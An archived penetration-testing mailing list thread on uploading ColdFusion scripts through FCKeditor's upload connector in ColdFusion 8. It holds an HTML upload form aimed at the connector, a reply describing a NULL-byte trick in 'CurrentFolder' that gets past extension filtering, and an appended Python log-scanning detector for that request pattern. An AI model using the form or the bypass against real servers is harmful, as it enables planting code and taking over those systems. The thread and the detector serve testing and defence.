Penetration Testing mailing list archives

Re: ColdFusion 8 w/ FCKEditor


From: "George A. Theall" <theall () tifaware com>
Date: Wed, 30 Jun 2010 19:42:19 -0400

On Wed, Jun 30, 2010 at 05:59:04PM -0300, The Dead wrote:
I got two servers with this condition.

In one of the servers, CFM files were allowed to be uploaded as ASP and
others. It was simple to upload to the server using an HTML-based form
as:

<html>
<form action="http://target/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?"
method="post" enctype="multipart/form-data">
      <input type="file" name="NewFile"></input>
      <input type="submit">
</form>

In another server, CFM extensions and others like ASP, PHP are not
allowed to be uploaded.
So, I'm trying something to solve this case.

The trick is to pass the name of the destination file through the
'CurrentFolder' parameter and follow it by a NULL byte, use an innocuous
file name for 'NewFile', and include CFM code as the contents.  I
suppose you might be able to substitute ASP code or something else, but
you _know_ the server supports ColdFusion scripts.

George
-- 
theall () tifaware com
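
Added example, not part of the original thread or either poster's code: a log check for the request shape described in the reply above, flagging calls to the FCKeditor CFM upload connector whose 'CurrentFolder' value carries a NUL byte or ends like a file name. It assumes the parameter is sent in the query string and that the web server writes common/combined-format access logs; the log lines, addresses and file names are constructed.

```python
import re
from urllib.parse import urlsplit, unquote

# Connector path as it appears in the form quoted in the thread.
CONNECTOR = "/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
EXT_RE = re.compile(r"\.[a-z0-9]{2,5}$", re.I)  # heuristic: value ends like a file name

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so a double-encoded %2500 is seen as NUL."""
    for _ in range(rounds):
        decoded = unquote(value, encoding="latin-1")
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return the reasons (possibly none) an access-log line deserves review."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    if fully_decode(parts.path).lower() != CONNECTOR:
        return []
    reasons = []
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        if fully_decode(name).lower() != "currentfolder":
            continue
        value = fully_decode(raw)
        if "\x00" in value:
            reasons.append("NUL byte in CurrentFolder")
        if EXT_RE.search(value.split("\x00")[0].rstrip("/")):
            reasons.append("CurrentFolder ends like a file name")
    return reasons

# Constructed sample lines (documentation addresses, placeholder names).
BASE = "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm"
SAMPLE_LOG = [
    f'192.0.2.10 - - [30/Jun/2010:19:40:01 -0400] "POST {BASE}?CurrentFolder=/ HTTP/1.1" 200 312',
    f'192.0.2.66 - - [30/Jun/2010:19:41:07 -0400] "POST {BASE}?CurrentFolder=/placeholder.cfm%00 HTTP/1.1" 200 298',
    f'192.0.2.66 - - [30/Jun/2010:19:41:30 -0400] "POST {BASE}?currentfolder=/placeholder.cfm%2500 HTTP/1.1" 200 298',
    '192.0.2.10 - - [30/Jun/2010:19:42:00 -0400] "GET /index.cfm HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for reason in inspect_line(line):
            print(f"{reason}: {line}")
```

A request that carries 'CurrentFolder' in the POST body instead will not show up in access logs, so the same two checks would need to run where the body is visible, such as a WAF or the connector itself.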
